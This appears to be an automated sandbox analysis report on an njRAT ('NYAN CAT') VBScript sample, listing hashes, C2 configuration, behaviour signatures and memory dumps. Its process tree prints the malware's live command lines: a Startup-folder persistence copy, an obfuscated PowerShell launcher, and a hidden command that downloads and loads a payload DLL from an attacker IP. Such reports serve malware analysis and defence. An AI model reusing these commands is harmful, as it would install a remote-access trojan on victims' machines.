njrat | 9932a9c3c258842f413e5866e866cf504affb707fbb37fcf02506c54e40f1f21

General

Target

NJ en lo que regresa.vbs
Size

484KB
MD5

cfe8083b99457520d371e972f4d340a9
SHA1

e11e37e2b04513bc50632265e4b81b24209ddd04
SHA256

9932a9c3c258842f413e5866e866cf504affb707fbb37fcf02506c54e40f1f21
SHA512

021c64c5762b6a75ee9fcabbe33656c49a259f427e94f754e53c31b20a5f2033ec925b114558cdd7ed34477e471a0850eafd8c046dee2961e47a236c2bbd6a64

Score

10^/10

njrat nyan cat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://149.56.200.165/dll/3.txt

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

venomsi.mypsx.net:81

Mutex

4c6c9a1bbdc34e6ebe

Attributes

reg_key
4c6c9a1bbdc34e6ebe
splitter
@!#&^%$

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

10 2824 powershell.exe
20 2824 powershell.exe

flow	pid	process
10	2824	powershell.exe
20	2824	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RHF.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RHF.vbs	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2824 set thread context of 1012 2824 powershell.exe RegSvcs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3536 PING.EXE

description	pid	process	target process
PID 2824 set thread context of 1012	2824	powershell.exe	RegSvcs.exe

pid	process
3536	PING.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegSvcs.exe

pid	process
3160	powershell.exe
3160	powershell.exe
3160	powershell.exe
2880	powershell.exe
2880	powershell.exe
2880	powershell.exe
2824	powershell.exe
2824	powershell.exe
2824	powershell.exe
1012	RegSvcs.exe
1012	RegSvcs.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegSvcs.exe

description	pid	process
Token: SeDebugPrivilege	3160	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeDebugPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe
Token: 33	1012	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1012	RegSvcs.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

WScript.execmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2336 wrote to memory of 2744	2336	WScript.exe	cmd.exe
PID 2336 wrote to memory of 2744	2336	WScript.exe	cmd.exe
PID 2744 wrote to memory of 3536	2744	cmd.exe	PING.EXE
PID 2744 wrote to memory of 3536	2744	cmd.exe	PING.EXE
PID 2744 wrote to memory of 3160	2744	cmd.exe	powershell.exe
PID 2744 wrote to memory of 3160	2744	cmd.exe	powershell.exe
PID 2336 wrote to memory of 2880	2336	WScript.exe	powershell.exe
PID 2336 wrote to memory of 2880	2336	WScript.exe	powershell.exe
PID 2880 wrote to memory of 2824	2880	powershell.exe	powershell.exe
PID 2880 wrote to memory of 2824	2880	powershell.exe	powershell.exe
PID 2824 wrote to memory of 1012	2824	powershell.exe	RegSvcs.exe
PID 2824 wrote to memory of 1012	2824	powershell.exe	RegSvcs.exe
PID 2824 wrote to memory of 1012	2824	powershell.exe	RegSvcs.exe
PID 2824 wrote to memory of 1012	2824	powershell.exe	RegSvcs.exe
PID 2824 wrote to memory of 1012	2824	powershell.exe	RegSvcs.exe
PID 2824 wrote to memory of 1012	2824	powershell.exe	RegSvcs.exe
PID 2824 wrote to memory of 1012	2824	powershell.exe	RegSvcs.exe
PID 2824 wrote to memory of 1012	2824	powershell.exe	RegSvcs.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NJ en lo que regresa.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2336

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\NJ en lo que regresa.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RHF.vbs')
2⤵
- Suspicious use of WriteProcessMemory
PID:2744

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 10
3⤵
- Runs ping.exe
PID:3536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\NJ en lo que regresa.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RHF.vbs')
3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3160

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC➠⇗↪Hk➠⇗↪d➠⇗↪Bl➠⇗↪Fs➠⇗↪XQBd➠⇗↪C➠⇗↪➠⇗↪J➠⇗↪BE➠⇗↪Ew➠⇗↪T➠⇗↪➠⇗↪g➠⇗↪D0➠⇗↪I➠⇗↪Bb➠⇗↪FM➠⇗↪eQBz➠⇗↪HQ➠⇗↪ZQBt➠⇗↪C4➠⇗↪QwBv➠⇗↪G4➠⇗↪dgBl➠⇗↪HI➠⇗↪d➠⇗↪Bd➠⇗↪Do➠⇗↪OgBG➠⇗↪HI➠⇗↪bwBt➠⇗↪EI➠⇗↪YQBz➠⇗↪GU➠⇗↪Ng➠⇗↪0➠⇗↪FM➠⇗↪d➠⇗↪By➠⇗↪Gk➠⇗↪bgBn➠⇗↪Cg➠⇗↪K➠⇗↪BO➠⇗↪GU➠⇗↪dw➠⇗↪t➠⇗↪E8➠⇗↪YgBq➠⇗↪GU➠⇗↪YwB0➠⇗↪C➠⇗↪➠⇗↪TgBl➠⇗↪HQ➠⇗↪LgBX➠⇗↪GU➠⇗↪YgBD➠⇗↪Gw➠⇗↪aQBl➠⇗↪G4➠⇗↪d➠⇗↪➠⇗↪p➠⇗↪C4➠⇗↪R➠⇗↪Bv➠⇗↪Hc➠⇗↪bgBs➠⇗↪G8➠⇗↪YQBk➠⇗↪FM➠⇗↪d➠⇗↪By➠⇗↪Gk➠⇗↪bgBn➠⇗↪Cg➠⇗↪JwBo➠⇗↪HQ➠⇗↪d➠⇗↪Bw➠⇗↪Do➠⇗↪Lw➠⇗↪v➠⇗↪DE➠⇗↪N➠⇗↪➠⇗↪5➠⇗↪C4➠⇗↪NQ➠⇗↪2➠⇗↪C4➠⇗↪Mg➠⇗↪w➠⇗↪D➠⇗↪➠⇗↪Lg➠⇗↪x➠⇗↪DY➠⇗↪NQ➠⇗↪v➠⇗↪GQ➠⇗↪b➠⇗↪Bs➠⇗↪C8➠⇗↪Mw➠⇗↪u➠⇗↪HQ➠⇗↪e➠⇗↪B0➠⇗↪Cc➠⇗↪KQ➠⇗↪p➠⇗↪Ds➠⇗↪WwBT➠⇗↪Hk➠⇗↪cwB0➠⇗↪GU➠⇗↪bQ➠⇗↪u➠⇗↪EE➠⇗↪c➠⇗↪Bw➠⇗↪EQ➠⇗↪bwBt➠⇗↪GE➠⇗↪aQBu➠⇗↪F0➠⇗↪Og➠⇗↪6➠⇗↪EM➠⇗↪dQBy➠⇗↪HI➠⇗↪ZQBu➠⇗↪HQ➠⇗↪R➠⇗↪Bv➠⇗↪G0➠⇗↪YQBp➠⇗↪G4➠⇗↪LgBM➠⇗↪G8➠⇗↪YQBk➠⇗↪Cg➠⇗↪J➠⇗↪BE➠⇗↪Ew➠⇗↪T➠⇗↪➠⇗↪p➠⇗↪C4➠⇗↪RwBl➠⇗↪HQ➠⇗↪V➠⇗↪B5➠⇗↪H➠⇗↪➠⇗↪ZQ➠⇗↪o➠⇗↪Cc➠⇗↪QwBs➠⇗↪GE➠⇗↪cwBz➠⇗↪Ew➠⇗↪aQBi➠⇗↪HI➠⇗↪YQBy➠⇗↪Hk➠⇗↪Mw➠⇗↪u➠⇗↪EM➠⇗↪b➠⇗↪Bh➠⇗↪HM➠⇗↪cw➠⇗↪x➠⇗↪Cc➠⇗↪KQ➠⇗↪u➠⇗↪Ec➠⇗↪ZQB0➠⇗↪E0➠⇗↪ZQB0➠⇗↪Gg➠⇗↪bwBk➠⇗↪Cg➠⇗↪JwBS➠⇗↪HU➠⇗↪bg➠⇗↪n➠⇗↪Ck➠⇗↪LgBJ➠⇗↪G4➠⇗↪dgBv➠⇗↪Gs➠⇗↪ZQ➠⇗↪o➠⇗↪CQ➠⇗↪bgB1➠⇗↪Gw➠⇗↪b➠⇗↪➠⇗↪s➠⇗↪C➠⇗↪➠⇗↪WwBv➠⇗↪GI➠⇗↪agBl➠⇗↪GM➠⇗↪d➠⇗↪Bb➠⇗↪F0➠⇗↪XQ➠⇗↪g➠⇗↪Cg➠⇗↪JwB0➠⇗↪Hg➠⇗↪d➠⇗↪➠⇗↪u➠⇗↪EE➠⇗↪UwBB➠⇗↪EM➠⇗↪M➠⇗↪➠⇗↪y➠⇗↪CU➠⇗↪V➠⇗↪BB➠⇗↪FI➠⇗↪SgBO➠⇗↪D➠⇗↪➠⇗↪Mg➠⇗↪l➠⇗↪DQ➠⇗↪Ng➠⇗↪w➠⇗↪DI➠⇗↪JQBl➠⇗↪HM➠⇗↪YQBi➠⇗↪C8➠⇗↪VwBF➠⇗↪E4➠⇗↪YQBz➠⇗↪GE➠⇗↪QwBj➠⇗↪HQ➠⇗↪YQBy➠⇗↪Eo➠⇗↪Tg➠⇗↪v➠⇗↪Gc➠⇗↪cgBv➠⇗↪C4➠⇗↪NQB1➠⇗↪GU➠⇗↪LgBh➠⇗↪HM➠⇗↪cwBh➠⇗↪GM➠⇗↪d➠⇗↪Bh➠⇗↪HI➠⇗↪agBu➠⇗↪C8➠⇗↪Lw➠⇗↪6➠⇗↪H➠⇗↪➠⇗↪d➠⇗↪B0➠⇗↪Gg➠⇗↪Jw➠⇗↪p➠⇗↪Ck➠⇗↪';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('➠⇗↪','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://149.56.200.165/dll/3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.ASAC02%TARJN02%4602%esab/WENasaCctarJN/gro.5ue.assactarjn//:ptth'))"
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2824

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1012

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d8c3c4611ad156dee7cdf45de540f56e

SHA1
d351c56876ff17f84e3875cbcd049e720448dad9

SHA256
8023cc85f0b97ffbc2c1b958ee4ea8627e0ea56c45f5f9db6e1a93647e20bb44

SHA512
2ae0258514271b2a135a2668ecf5b17c391bca69a2e0fae267080ddba900e3e1e5ac7d1fd4039fba2ddead047f3e5545a88872c1843d9659c2ed82238d89bced

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
25edd5c58becb7f16ab5892f6f5a1b1b

SHA1
c5a343c1ac1d396c1c99548d6fbbc0f7a064e54d

SHA256
0a963d49ebb1e32def491838129a76341ea1094e99d5de33377285bfbeaf0817

SHA512
0786aa8d2356e41a9861465646977fa57dcde0d37057cfc49e1ca3a68e8b2169097bdd181e6b152c7db1950a4dd560d8399ba112bd7db01c7eabe75d3f69a6b6

Download Submit
memory/1012-185-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1012-187-0x00000000054D0000-0x00000000059CE000-memory.dmp

Filesize
5.0MB

Download
memory/1012-186-0x0000000004F30000-0x0000000004FCC000-memory.dmp

Filesize
624KB

Download
memory/1012-188-0x0000000005130000-0x00000000051C2000-memory.dmp

Filesize
584KB

Download
memory/1012-184-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1012-189-0x0000000004FD0000-0x00000000054CE000-memory.dmp

Filesize
5.0MB

Download
memory/1012-179-0x000000000040677E-mapping.dmp

Download
memory/1012-178-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1012-190-0x00000000050B0000-0x00000000050BA000-memory.dmp

Filesize
40KB

Download
memory/2744-115-0x0000000000000000-mapping.dmp

Download
memory/2824-174-0x000001F3463F0000-0x000001F3463F2000-memory.dmp

Filesize
8KB

Download
memory/2824-176-0x000001F348266000-0x000001F348268000-memory.dmp

Filesize
8KB

Download
memory/2824-180-0x000001F3463F0000-0x000001F3463F2000-memory.dmp

Filesize
8KB

Download
memory/2824-177-0x000001F362570000-0x000001F3625C2000-memory.dmp

Filesize
328KB

Download
memory/2824-175-0x000001F348220000-0x000001F34822E000-memory.dmp

Filesize
56KB

Download
memory/2824-171-0x000001F348263000-0x000001F348265000-memory.dmp

Filesize
8KB

Download
memory/2824-169-0x000001F348260000-0x000001F348262000-memory.dmp

Filesize
8KB

Download
memory/2824-164-0x000001F3463F0000-0x000001F3463F2000-memory.dmp

Filesize
8KB

Download
memory/2824-163-0x000001F3625F0000-0x000001F362666000-memory.dmp

Filesize
472KB

Download
memory/2824-162-0x000001F3463F0000-0x000001F3463F2000-memory.dmp

Filesize
8KB

Download
memory/2824-161-0x000001F3463F0000-0x000001F3463F2000-memory.dmp

Filesize
8KB

Download
memory/2824-160-0x000001F3463F0000-0x000001F3463F2000-memory.dmp

Filesize
8KB

Download
memory/2824-158-0x000001F3463F0000-0x000001F3463F2000-memory.dmp

Filesize
8KB

Download
memory/2824-157-0x000001F346660000-0x000001F346682000-memory.dmp

Filesize
136KB

Download
memory/2824-156-0x000001F3463F0000-0x000001F3463F2000-memory.dmp

Filesize
8KB

Download
memory/2824-155-0x000001F3463F0000-0x000001F3463F2000-memory.dmp

Filesize
8KB

Download
memory/2824-154-0x000001F3463F0000-0x000001F3463F2000-memory.dmp

Filesize
8KB

Download
memory/2824-153-0x000001F3463F0000-0x000001F3463F2000-memory.dmp

Filesize
8KB

Download
memory/2824-152-0x000001F3463F0000-0x000001F3463F2000-memory.dmp

Filesize
8KB

Download
memory/2824-151-0x0000000000000000-mapping.dmp

Download
memory/2880-132-0x0000000000000000-mapping.dmp

Download
memory/2880-148-0x0000021CAD210000-0x0000021CAD286000-memory.dmp

Filesize
472KB

Download
memory/2880-147-0x0000021C91060000-0x0000021C91062000-memory.dmp

Filesize
8KB

Download
memory/2880-145-0x0000021C91060000-0x0000021C91062000-memory.dmp

Filesize
8KB

Download
memory/2880-146-0x0000021C91060000-0x0000021C91062000-memory.dmp

Filesize
8KB

Download
memory/2880-144-0x0000021C91060000-0x0000021C91062000-memory.dmp

Filesize
8KB

Download
memory/2880-183-0x0000021CAB0B6000-0x0000021CAB0B8000-memory.dmp

Filesize
8KB

Download
memory/2880-142-0x0000021C92F30000-0x0000021C92F52000-memory.dmp

Filesize
136KB

Download
memory/2880-141-0x0000021C91060000-0x0000021C91062000-memory.dmp

Filesize
8KB

Download
memory/2880-140-0x0000021C91060000-0x0000021C91062000-memory.dmp

Filesize
8KB

Download
memory/2880-139-0x0000021C91060000-0x0000021C91062000-memory.dmp

Filesize
8KB

Download
memory/2880-138-0x0000021C91060000-0x0000021C91062000-memory.dmp

Filesize
8KB

Download
memory/2880-182-0x0000021C91060000-0x0000021C91062000-memory.dmp

Filesize
8KB

Download
memory/2880-137-0x0000021C91060000-0x0000021C91062000-memory.dmp

Filesize
8KB

Download
memory/2880-166-0x0000021CAB0B0000-0x0000021CAB0B2000-memory.dmp

Filesize
8KB

Download
memory/2880-167-0x0000021CAB0B3000-0x0000021CAB0B5000-memory.dmp

Filesize
8KB

Download
memory/2880-149-0x0000021C91060000-0x0000021C91062000-memory.dmp

Filesize
8KB

Download
memory/3160-135-0x000002AFE4766000-0x000002AFE4768000-memory.dmp

Filesize
8KB

Download
memory/3160-128-0x000002AF825C0000-0x000002AF82636000-memory.dmp

Filesize
472KB

Download
memory/3160-134-0x000002AFE4763000-0x000002AFE4765000-memory.dmp

Filesize
8KB

Download
memory/3160-129-0x000002AFE4730000-0x000002AFE4732000-memory.dmp

Filesize
8KB

Download
memory/3160-133-0x000002AFE4760000-0x000002AFE4762000-memory.dmp

Filesize
8KB

Download
memory/3160-125-0x000002AFE4730000-0x000002AFE4732000-memory.dmp

Filesize
8KB

Download
memory/3160-124-0x000002AFE4730000-0x000002AFE4732000-memory.dmp

Filesize
8KB

Download
memory/3160-131-0x000002AFE4730000-0x000002AFE4732000-memory.dmp

Filesize
8KB

Download
memory/3160-123-0x000002AF82210000-0x000002AF82232000-memory.dmp

Filesize
136KB

Download
memory/3160-127-0x000002AFE4730000-0x000002AFE4732000-memory.dmp

Filesize
8KB

Download
memory/3160-126-0x000002AFE4730000-0x000002AFE4732000-memory.dmp

Filesize
8KB

Download
memory/3160-122-0x000002AFE4730000-0x000002AFE4732000-memory.dmp

Filesize
8KB

Download
memory/3160-121-0x000002AFE4730000-0x000002AFE4732000-memory.dmp

Filesize
8KB

Download
memory/3160-120-0x000002AFE4730000-0x000002AFE4732000-memory.dmp

Filesize
8KB

Download
memory/3160-118-0x000002AFE4730000-0x000002AFE4732000-memory.dmp

Filesize
8KB

Download
memory/3160-119-0x000002AFE4730000-0x000002AFE4732000-memory.dmp

Filesize
8KB

Download
memory/3160-117-0x0000000000000000-mapping.dmp

Download
memory/3536-116-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads